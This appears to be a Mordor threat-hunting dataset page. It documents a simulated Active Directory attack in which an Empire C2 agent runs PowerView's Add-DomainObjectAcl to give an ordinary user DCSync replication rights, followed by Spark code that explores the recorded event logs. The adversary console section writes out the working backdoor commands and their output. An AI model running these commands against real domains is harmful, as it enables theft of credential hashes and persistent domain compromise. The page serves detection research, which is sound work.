Empire Powerview Add-DomainObjectAcl

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/01

Modification Date

2020/09/20

Tactics

[‘TA0005’]

Techniques

[‘T1222.001’]

Tags

[‘AD Object Modification’, ‘AD Object nTSecurityDescriptor’, ‘LDAP ModifyRequest’]

Dataset Description

This datasets represent adversaries with enough permissions (i.e. domain admin) adding an access control entry (ACE) to the discretionary access control list (DACL) of an Active Directory object (i.e Root Domain). One example could be adversaries modifying the root domain DACL to allow a specific domain user, despite being in no privileged groups and not having local admin rights on the domain controller itself, to use Active Directory replication services and obtain secret domain data (i.e. Other user NTLM Hashes)

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Threat Hunter Playbook

Active Directory Replication User Backdoor

https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html

Simulation Plan

Environment

Tool Type

Module

https://github.com/OTRF/mordor-labs/tree/master/environments/windows/shire

C2

powerview

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            

8BUCWV1P ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2488   5/0.0    2020-09-21 17:09:43  http            

(Empire: agents) > interact 8BUCWV1P
(Empire: 8BUCWV1P) > scriptimport data/module_source/situational_awareness/network/powerview.ps1
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_IMPORT
[*] Agent 8BUCWV1P tasked with task ID 1
(Empire: 8BUCWV1P) > 
script successfully saved in memory

(Empire: 8BUCWV1P) > scriptcmd Add-DomainObjectAcl -TargetIdentity "dc=theshire,dc=local" -TargetDomain theshire.local -PrincipalIdentity nmartha -Rights DCSync
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND
[*] Agent 8BUCWV1P tasked with task ID 2
(Empire: 8BUCWV1P) > 
Job started: 5WSPKL

(Empire: 8BUCWV1P) > scriptcmd $nmarthaSid = Get-DomainUser nmartha | Select-Object -ExpandProperty objectsid; Get-DomainObjectACL  "dc=theshire,dc=local" -Domain theshire.local -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $nmarthaSid}
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND
[*] Agent 8BUCWV1P tasked with task ID 3
(Empire: 8BUCWV1P) > 
Job started: YG1ZB3

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-All
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/empire_powerview_ldap_ntsecuritydescriptor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |2785 |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |2771 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |806  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |450  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |306  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |296  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |100  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |96   |
|WORKSTATION6.theshire.local|security                                |4658   |94   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |88   |
|WORKSTATION5.theshire.local|Security                                |4658   |76   |
|MORDORDC.theshire.local    |Security                                |5156   |76   |
|MORDORDC.theshire.local    |Security                                |4658   |70   |
|WORKSTATION5.theshire.local|Security                                |5158   |65   |
|WORKSTATION6.theshire.local|security                                |5158   |53   |
|WORKSTATION5.theshire.local|Security                                |5156   |52   |
|WORKSTATION6.theshire.local|security                                |4656   |47   |
|WORKSTATION6.theshire.local|security                                |4663   |47   |
|WORKSTATION6.theshire.local|security                                |4690   |47   |
|WORKSTATION6.theshire.local|security                                |4673   |43   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows